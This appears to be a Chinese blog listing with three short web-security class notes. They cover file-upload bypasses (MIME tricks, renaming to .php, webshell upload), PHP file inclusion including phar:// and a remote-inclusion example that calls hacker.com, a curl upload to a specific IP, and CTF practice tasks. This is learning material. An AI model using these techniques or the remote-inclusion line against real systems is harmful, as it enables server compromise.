- 博客(5)
- 收藏
- 关注
RSS订阅原创 第六次课笔记
curl -v http://121.199.160.115:8013/index.php -F "file=@待上传文件路径"·/index.php?·include($_GET['page'].".php") 只能上传txt文件,只能包含php文件。·phar://1.zip/1.php 可以将1.php提取到内存(不生成实际文件)x=http://hacker.com/1.txt 远程文件包含。·在文件包含时,PHP会尝试去执行被包含文件中的代码(PHP文件包含特性1)
2024-04-10 20:56:37
750
1
原创 第五次课笔记
//post里的值相当于密码。·点击上传后,弹窗的速度,慢速表示前端不是js,快速大概率是js。> //post里的值相当于密码,一句木马。·用burp suite把文件名由jpg改成php。·中间件解析绕过 //可以理解为服务器本身,不是root。·可执行 //php、asp、jsp恶意脚本文件。·docker是基础,docker-compose是功能。·上传webshell。·对上传文件进行后缀名限制,不可解析。·MIME绕过 //媒体类型。·nmap //端口,端口不一定对应某服务。
2024-04-10 20:54:07
291
1
原创 第四次笔记
80 HTTP,22 SSH,21 FTP,445 SMB(可以自己改端口)·POST请求change method request。·黑箱测试(zero-knowledge testing)·HTTP是明文,可以被嗅探;·攻防世界 Web w eak_auth。·访问返回,访问返回,无任何交互。·选择不影响业务系统正常运行的攻击方法进行测试。·HEAD只返回网站是否存活。·防火墙、入侵检测系统。·攻防世界 Web get_post。·主要目标:请求中的参数;·攻防世界 Web Cookie。
2024-03-29 15:45:44
319
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人